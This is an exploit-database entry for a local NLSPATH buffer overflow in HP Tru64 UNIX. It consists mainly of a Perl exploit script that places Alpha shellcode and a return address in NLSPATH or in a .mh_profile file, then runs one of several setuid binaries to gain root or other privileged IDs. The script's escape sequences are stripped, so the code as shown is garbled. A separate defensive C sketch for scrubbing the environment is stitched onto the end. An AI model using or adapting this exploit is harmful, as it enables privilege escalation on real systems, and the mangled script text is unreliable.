HP Tru64 – NLSPATH Environment Variable Local Buffer Overflow (1)
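Vulnerability ID | 1053596 | Vulnerability type | |
Published | 2002-07-03 | Updated | 2002-07-03 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Unix | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit (EXP)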
source: http://www.securityfocus.com/bid/5647/info
Tru64 is a commercially available UNIX operating system. Tru64 was originally developed by Digital and is now distributed and maintained by HP.
A buffer overflow has been discovered in a number of Tru64 binaries. Attackers may exploit this via an overly long value for the NLSPATH environment variable. Because of this flaw, a local attacker may be able to execute arbitrary instructions. As a result, the attacker may be able to execute malicious code and elevate privileges.
#!/usr/bin/perl -w
#
# Tru64 5.1 NLSPATH
#
# stripey ([email protected]) - 03/07/2002
#
$tgts{"0"} = pack("l",0x40011a10).":/usr/tcb/bin/edauth:uid=root";
$tgts{"1"} = pack("l",0x40014280).":/usr/sbin/imapd:euid=root";
$tgts{"2"} = pack("l",0x400120b0).":/usr/bin/rdist:euid=root";
$tgts{"3"} = pack("l",0x40014a80).":/usr/bin/mh/inc:euid=root";
$tgts{"4"} = pack("l",0x40010104).":/usr/bin/mh/msgchk:euid=root";
$tgts{"5"} = pack("l",0x40010c04).":/usr/dt/bin/dtsession:euid=root";
$tgts{"6"} = pack("l",0x400a7908).":/usr/bin/X11/dxsysinfo:euid=root, requires valid $DISPLAY";
$tgts{"7"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd:euid=root, requires valid $DISPLAY";
$tgts{"8"} = pack("l",0x400105e8).":/usr/bin/deliver:euid=imap";
$tgts{"9"} = pack("l",0x4003c190).":/usr/bin/uucp:euid=uucp,egid=uucp";
$tgts{"A"} = pack("l",0x400361f0).":/usr/bin/uux:euid=uucp,egid=uucp";
unless (($target,$offset,$align) = @ARGV,$align) {
print "-"x72;
print "n Tru64 NLSPATH overflow, [email protected], 03/07/2002n";
print "-"x72;
print "nnUsage: $0 <target> <offset> <align>nnTargets:nn";
foreach $key (sort(keys %tgts)) {
($a,$b,$c) = split(/:/,$tgts{"$key"});
print "t$key. $b ( $c )n";
}
print "n";
exit 1;
}
($a,$b) = split(/:/,$tgts{"$target"});
print "*** Target: $b, Offset: $offset, Align: $align ***nn";
$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);
$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
$sc .= "x20x35x60x42xffxffxffxff";
$tlen = (1024-(length($sc)))/4;
$buf .= "B"x$align;
$buf .= pack("l",0x47ff041f)x($tlen-1);
$buf .= $sc;
$buf .= $ret;
$ENV{"NLSPATH"} = $buf;
if ($target eq 8) { print "Hit ctrl-d...n"; }
if ($target eq 3) {
$buf_b = "AA";
$buf_b .= pack("l",0x47ff041f)x512;
$buf_b .= $sc;
open(OH,">.mh_profile");
print OH "Path: $buf_bn";
close(OH);
}
if ($target eq "4") {
$buf_b = "AA";
$buf_b .= pack("l",0x47ff041f)x2000;
$buf_b .= $sc;
open(OH,">.mh_profile");
print OH "Path: $buf_bn";
close(OH);
}
if ($target eq 2) {
exec("$b","-d","a=asdf","-c","/tmp/","'${a}'");
}
if ($target eq 0) {
$buf_b = "B"x30000;
exec("$b","-g","-dt",$buf_b);
}
exec("$b");
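
A mitigation sketch for the flaw described above, added here as an example and not part of the original advisory or the script: a privileged program can scrub its inherited environment before any message-catalog code runs, dropping NLSPATH outright along with any variable whose value exceeds a length limit. The function names and the 1024-byte limit are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_ENV_VALUE 1024  /* assumed policy limit, not taken from the advisory */

/* Decide whether one "NAME=value" entry is unsafe to inherit. */
static int must_drop(const char *entry, size_t max_value)
{
    const char *eq = strchr(entry, '=');
    if (eq == NULL || eq == entry)
        return 1;                              /* malformed: no '=' or empty name */
    if ((size_t)(eq - entry) == 7 && memcmp(entry, "NLSPATH", 7) == 0)
        return 1;                              /* catalog search path from the caller */
    return strlen(eq + 1) > max_value;         /* oversized value in any variable */
}

/* Compact a NULL-terminated environment array in place, keeping only
   safe entries. Returns the number of entries removed. */
size_t scrub_env(char **envp, size_t max_value)
{
    size_t kept = 0, dropped = 0;
    for (size_t i = 0; envp[i] != NULL; i++) {
        if (must_drop(envp[i], max_value))
            dropped++;
        else
            envp[kept++] = envp[i];
    }
    envp[kept] = NULL;
    return dropped;
}

int main(void)
{
    /* Constructed sample environment: one oversized NLSPATH among normal entries. */
    static char big[8 + 4096 + 1] = "NLSPATH=";
    memset(big + 8, 'A', 4096);
    char *env[] = { "PATH=/usr/bin", big, "HOME=/root", NULL };
    size_t n = scrub_env(env, MAX_ENV_VALUE);
    printf("dropped %zu, kept: %s %s\n", n, env[0], env[1]);
    return 0;
}
```

In a setuid program this would be called on `environ` at the top of `main()`, before `setlocale()` or `catopen()` is reached.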